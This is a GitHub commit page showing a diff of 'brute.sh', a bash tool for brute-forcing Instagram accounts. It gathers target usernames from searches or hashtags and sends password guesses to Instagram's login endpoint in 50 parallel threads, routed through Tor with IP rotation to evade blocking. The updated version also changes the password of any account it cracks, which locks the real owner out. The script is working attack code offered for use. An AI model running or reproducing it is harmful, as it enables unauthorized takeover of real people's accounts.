Skip to content

Commit

Permalink
Update brute.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
@ItsMeLBoy
ItsMeLBoy authored Apr 6, 2020
1 parent ff78a03 commit 965cd30
Showing 1 changed file with 136 additions and 96 deletions.
232 changes: 136 additions & 96 deletions brute.sh
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
# !/bin/bash
# author : ./Lolz
# thanks to : JavaGhost - @Bashid.org
# recode tinggal recode aja okeh?, tapi cantumin source Y tolol h3h3
# Author : ./Lolz
# Thanks to : JavaGhost - Bashid.org
# Recode tinggal recode aja okeh, tapi cantumin source lah tolol
# Yamaap kalau scriptnya acak"an:(

# color(bold)
Expand All @@ -13,112 +13,152 @@ magenta='\e[1;35m'
cyan='\e[1;36m'
white='\e[1;37m'

# thread limit => kurangin lebih kecil angkanya boleh, naikin? saran w jangan... awokwowok:v
limit=50
# trap
trap ctrl_c INT

# banner
echo -e $'''
_ __ _
__ | _|_ o |_)|_ o (_|
||||_| | |_ | |_)| ___ | __|
\e[1;31mcontact: https://fb.me/n00b.me\e[1;37m
'''
# start function
function ctrl_c(){
rm *.tmp*
}

# dependencies
dependencies=( "jq" "curl" )
for i in "${dependencies[@]}"
do
command -v $i >/dev/null 2>&1 || {
echo >&2 "$i : not installed - install by typing the command : apt install $i -y"
exit
}
done
# checking run tor
check_tor=$(curl --socks5-hostname localhost:9050 -s "https://www.google.com" > /dev/null; echo $?)
if [[ $check_tor -gt 0 ]]; then
echo -e "${white}[ ${red}ERROR${white} ] TOR not runing! ${red}-${white} run with type ${red}'${green}tor${red}'${white} in your terminal"
exit
fi

# menu
# create file
touch target.tmp user.tmp unknown.tmp

# banner + menu
echo -e '''
1]. Get target from specific \e[1;31m@username\e[1;37m
2]. Get target from specific \e[1;31m#hashtag\e[1;37m
3]. Crack from your target list
'''
\e[1;37m _ __ _
\e[1;37m__ | _|_ o |_)|_ o (_|
\e[1;37m||||_| | |_ | |_)| ___ | __|
\e[1;37m[\e[1;31m Contact \e[1;31m:\e[1;34m https://fb.me/n00b.me\e[1;37m ]
read -p $'What do you want : \e[1;33m' opt
1\e[1;31m. \e[1;37mGet \e[1;31m+ \e[1;37mcrack target from spesific \e[1;32m@username\e[1;37m
2\e[1;31m. \e[1;37mGet \e[1;31m+ \e[1;37mcrack target from spesific \e[1;32m@hashtag\e[1;37m
3\e[1;31m. \e[1;37mCrack target from target list\e[1;37m
'''

touch target
# asking
echo -ne "${white}[ ${red}?${white} ] Choose what you want boy ${red}:${green} " ; read ask_menu

case $opt in
1) # menu 1
read -p $'\e[37m[\e[34m?\e[37m] Search by query : \e[1;33m' ask
collect=$(curl -s "https://www.instagram.com/web/search/topsearch/?context=blended&query=${ask}" | jq -r '.users[].user.username' > target)
echo $'\e[37m[\e[34m+\e[37m] Just found : \e[1;33m'$collect''$(< target wc -l ; echo -e "${white}user")
read -p $'[\e[1;34m?\e[1;37m] Password to use : \e[1;33m' pass
echo -e "${white}[${yellow}!${white}] ${red}Start cracking...${white}"
;;
2) # menu 2
read -p $'\e[37m[\e[34m?\e[37m] Tags for use : \e[1;33m' hashtag
get=$(curl -sX GET "https://www.instagram.com/explore/tags/${hashtag}/?__a=1")
if [[ $get =~ "Page Not Found" ]]; then
echo -e "$hashtag : ${red}Hashtag not found${white}"
exit
else
echo "$get" | jq -r '.[].hashtag.edge_hashtag_to_media.edges[].node.shortcode' | awk '{print "https://www.instagram.com/p/"$0"/"}' > result
echo -e "${white}[${blue}!${white}] Removing duplicate user from tag ${red}#$hashtag${white}"$(sort -u result > hashtag)
echo -e "[${blue}+${white}] Just found : ${yellow}"$(< hashtag wc -l ; echo -e "${white}user")
read -p $'[\e[34m?\e[37m] Password to use : \e[1;33m' pass
echo -e "${white}[${yellow}!${white}] ${red}Start cracking...${white}"
for tag in $(cat hashtag); do
echo $tag | xargs -P 100 curl -s | grep -o "alternateName.*" | cut -d "@" -f2 | cut -d '"' -f1 >> target &
# select menu
case $ask_menu in
1 ) # menu 1
echo -e "\n${white}[ ${red}NOTE${white} ] ${red}:${white} Give space to search for more than 1 user ${red}[${white} example ${red}:${white} user1 user2 ${red}]${white}"
echo -ne "${white}[ ${red}?${white} ] Input spesific username ${red}:${green} " ; read ask_user && echo $ask_user | tr " " "\n" > username.tmp
for get_user in $(cat username.tmp); do
get_list_user=$(curl -s "https://www.instagram.com/web/search/topsearch/?context=blended&query=${get_user}" | jq -r '.users[].user.username' >> target.tmp)
done
echo -e "${white}[ ${red}+${white} ] Found ${red}:${green} $(< target.tmp wc -l) user ${white}with user ${red}:${green} ${ask_user}${white}"
echo -ne "${white}[ ${red}?${white} ] Password to use ${red}:${green} " ; read ask_pass && echo $ask_pass | tr " " "\n" >> wordlist.tmp
echo -e "${white}[ ${green}INFO${white} ] - Start cracking \e[4m${green}$(< target.tmp wc -l)${white}\e[0m user using pass ${red}:${green} \e[4m${ask_pass}${white}\e[0m\n"
;;
2 ) # menu 2
echo -ne "\n${white}[ ${red}?${white} ] Input spesific hashtag ${red}:${green} " ; read ask_tag
get_list_user=$(curl -sXGET "https://www.instagram.com/explore/tags/${ask_tag}/?__a=1")
if [[ $get_list_user =~ "Page Not Found" ]]; then
echo -e "${white}[ ${red}-${white} ] Hashtag ${red}:${green} ${ask_tag} ${red}-${white} Not found"
exit
else
echo $get_list_user | jq -r '.[].hashtag.edge_hashtag_to_media.edges[].node.shortcode' | awk '{print "https://www.instagram.com/p/"$0"/"}' > user.tmp
for tag_user in $(cat user.tmp); do
echo $tag_user | xargs -P 100 curl -s | grep -o "alternateName.*" | cut -d "@" -f2 | cut -d '"' -f1 >> target.tmp &
done
wait
rm hashtag result
fi
;;
3) # menu 3
read -p $'\e[37m[\e[34m?\e[37m] Input your list : \e[1;33m' list
if [[ ! -e $list ]]; then
echo -e "${red}file not found${white}"
exit
else
cat $list > target
echo -e "[${blue}+${white}] Total your list : ${yellow}"$(< target wc -l)
read -p $'[\e[34m?\e[37m] Password to use : \e[1;33m' pass
echo -e "${white}[${yellow}!${white}] ${red}Start cracking...${white}"
fi
;;
*) # wrong menu
echo -e "${white}options are not on the menu"
sleep 1
clear
bash brute.sh
echo -e "${white}[ ${red}!${white} ] Please wait..."
echo -e "${white}[ ${red}!${white} ] Removing duplicate user $(sort -u user.tmp -o user.tmp)"
echo -e "${white}[ ${red}+${white} ] Found ${red}:${green} $(< target.tmp wc -l) user in hashtag ${red}:${green} ${ask_tag}${white}"
echo -ne "${white}[ ${red}?${white} ] Password to use ${red}:${green} " ; read ask_pass && echo $ask_pass | tr " " "\n" >> wordlist.tmp
echo -e "${white}[ ${green}INFO${white} ] ${red}-${white} Start cracking \e[4m${green}$(< target.tmp wc -l)${white}\e[0m user using pass ${red}:${green} \e[4m${ask_pass}${white}\e[0m\n"
fi
;;
3 ) # menu 3
echo -ne "${white}[ ${red}?${white} ] Input list target username ${red}:${green} " ; read ask_list
if [[ ! -e $ask_list ]]; then
echo -e "${white}[ ${red}!${white} ] ${red}List not found in your directory${white}"
else
cat $ask_list > target.tmp
echo -ne "${white}[ ${red}?${white} ] Password to use ${red}:${green} " ; read ask_pass && echo $ask_pass | tr " " "\n" >> wordlist.tmp
echo -e "${white}[ ${green}INFO${white} ] ${red}-${white} Start cracking \e[4m${green}$(< target.tmp wc -l)${white}\e[0m user using pass ${red}:${green} \e[4m${ask_pass}${white}\e[0m\n"
fi
;;
* ) # wrong menu
echo -e "${white}[ ${red}ERROR${white} ] ${red}:${white} Option not on menu boy..."
sleep 2
clear
bash brute.sh
;;
esac

# start_brute
token=$(curl -sLi "https://www.instagram.com/accounts/login/ajax/" | grep -o "csrftoken=.*" | cut -d "=" -f2 | cut -d ";" -f1)
function brute(){
url=$(curl -s -c cookie.txt -X POST "https://www.instagram.com/accounts/login/ajax/" \
-H "cookie: csrftoken=${token}" \
-H "origin: https://www.instagram.com" \
-H "referer: https://www.instagram.com/accounts/login/" \
-H "user-agent: Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930T1 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" \
-H "x-csrftoken: ${token}" \
-H "x-requested-with: XMLHttpRequest" \
-d "username=${i}&password=${pass}")
login=$(echo $url | grep -o "authenticated.*" | cut -d ":" -f2 | cut -d "," -f1)
if [[ $login =~ "true" ]]; then
echo -e "[${green}+${white}] ${yellow}You get it! ${blue}[${white}@$i - $pass${blue}] ${white}- with: "$(curl -sXGET "https://instagram.com/${i}/" -L | grep -o '<meta property="og:description" content=".*' | cut -d '"' -f4 | cut -d " " -f1)
elif [[ $login =~ "false" ]]; then
echo -e "[${red}!${white}] @$i - ${red}failed to crack${white}"
elif [[ $url =~ "checkpoint_required" ]]; then
echo -e "[${cyan}?${white}] @$i ${white}: ${green}checkpoint${white}"
fi
# change password after brute force [ if success ]
function change_password(){
csrftoken=$(curl -sL -sXGET -b Cookies_${user}.tmp --url "https://www.instagram.com" -H "user-agent: Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930T1 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" | grep -o "csrf_token.*" | cut -d '"' -f3)
change=$(curl -sL -sXPOST -b Cookies_${user}.tmp --url "https://www.instagram.com/accounts/password/change/" \
-H "user-agent: Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930T1 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" \
-H "x-csrftoken: ${csrftoken}" \
-d "old_password=${pass}&new_password1=${ask_new_pass}&new_password2=${ask_new_pass}" | jq -r '.status')
if [[ $change == "ok" ]]; then
echo -e "${white} [ ${red}+${white} ] User ${red}:${green} @${user} ${red}-${white} Success change pass to ${red}:${green} ${ask_new_pass}${white}"
else
echo -e " ${white} [ ${red}FAILED CHANGE PASS${white} ] ${red}-${white} @${user}${red}:${white}${ask_new_pass} ${red}-${white} Contact ${red}:${blue} https://fb.me/n00b.me${white}"
fi
}

# asking change pass
echo -ne "${white}[ ${red}?${white} ] Do you want auto change pass after get some account ${red}( ${white}y/n ${red})${white} ${red}:${green} " ; read ask_change_pass
if [[ $ask_change_pass == "Y" || $ask_change_pass == "y" ]]; then
echo -ne "${white}[ ${red}?${white} ] Input new pass ${red}:${green} " ; read ask_new_pass
echo ""
elif [[ $ask_change_pass == "N" || $ask_change_pass == "n" ]]; then
echo ""
fi

# login
function brute_force(){
# Start brute force
token=$(curl -sLi "https://www.instagram.com/accounts/login/ajax/" | grep -o "csrftoken=.*" | cut -d "=" -f2 | cut -d ";" -f1)
login=$(curl -sc Cookies_${user}.tmp -XPOST "https://www.instagram.com/accounts/login/ajax/" \
-H "cookie: csrftoken=${token}" \
-H "origin: https://www.instagram.com" \
-H "referer: https://www.instagram.com/accounts/login/" \
-H "user-agent: Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G930T1 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" \
-H "x-csrftoken: ${token}" \
-H "x-requested-with: XMLHttpRequest" \
-d "username=${user}&password=${pass}") ; true_login=$(echo $login | jq -r '.authenticated')
if [[ $true_login =~ "true" ]]; then
local followers=$(curl -sXGET "https://instagram.com/${user}/" -L | grep -o '<meta property="og:description" content=".*' | cut -d '"' -f4 | cut -d " " -f1)
echo -e " ${white}[ ${green}GOT ACCOUNT${white} ] ${red}-${white} @${user}${red}:${white}${pass} ${red}:${green} ${followers} ${white}Followers"
if [[ $ask_change_pass == "Y" || $ask_change_pass == "y" ]]; then
change_password
fi
killall -HUP tor
elif [[ $login =~ "checkpoint_required" ]]; then
echo -e " ${white}[ ${cyan}CHECKPOINT${white} ] ${red}-${white} @${user}${red}:${white}${pass}"
killall -HUP tor
elif [[ $login =~ "false" ]]; then
echo -e " ${white}[ ${red}FAILED TO CRACK${white} ] ${red}-${white} @${user}${red}:${white}${pass}"
killall -HUP tor
else
echo -e " ${white}[ ${yellow}UNKNOWN ERROR${white} ]${red} ${white}- @${user}${red}:${white}${pass}"
killall -HUP tor
fi
}

# thread
# multithread
(
for i in $(cat target); do
((thread=thread%limit)); ((thread++==0)) && wait
brute "$i" &
done
wait
LIMIT="50" # thread
for user in $(cat target.tmp); do
for pass in $(cat wordlist.tmp); do
((thread=thread%LIMIT)); ((thread++==0)) && wait
brute_force "$user" &
done
done
wait
)

rm target
rm *.tmp*

0 comments on commit 965cd30

Please sign in to comment.